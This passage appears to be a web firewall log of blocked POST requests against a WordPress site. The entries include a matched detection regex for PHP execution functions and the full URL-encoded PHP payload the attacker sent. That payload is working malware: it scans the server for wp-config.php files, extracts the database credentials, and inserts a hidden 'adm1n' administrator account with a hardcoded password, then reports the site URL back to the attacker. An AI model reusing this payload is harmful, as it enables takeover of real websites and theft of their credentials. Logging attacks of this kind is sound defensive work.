4user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 06:04:18","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> ky:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sodium_compat\/src\/Core32\/X25519.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\nsec-fetch-site:none\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=4718f09e2a2be7b472f3efbae62d97b4; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvn3xvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzyhqTIlozSfVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:12640\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-mode:navigate\n\nky=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%